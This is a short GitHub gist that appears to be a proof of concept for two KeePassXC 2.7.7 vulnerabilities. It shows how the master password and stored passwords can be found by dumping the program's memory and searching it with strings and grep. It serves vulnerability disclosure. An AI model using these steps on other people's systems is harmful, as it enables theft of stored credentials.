Skip to content

Instantly share code, notes, and snippets.

@Fastor01
Last active July 3, 2024 13:31
Show Gist options
  • Save Fastor01/30c6d89c842feb1865ec2cd2d3806838 to your computer and use it in GitHub Desktop.
Save Fastor01/30c6d89c842feb1865ec2cd2d3806838 to your computer and use it in GitHub Desktop.
POC: CVE-2024-33900, CVE-2024-33901
1. Get memory dump of KeePassXC (e.g. via Windows Taskmanager or virutalbox debugvm)
2a. CVE-2024-33900 - get master password: string -e b <filename> | grep "YOUR MASTER PASSWORD"
2b. CVE-2024-33901 - get stored password: string -e b <filename> | grep "YOUR STORED PASSWORD"
Note: Both attacks works every time when the database is open in KeePassXC. When the database is closed or locked the probability is 1 in 10 respectively 4 in 10.
Why does it work?: Don't really know :P But is the data is somewhere in the memory regions of the qt-framework as UTF-16 string.
This affects KeePassXC version 2.7.7. There is a high probablity, that other versions are also affected.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment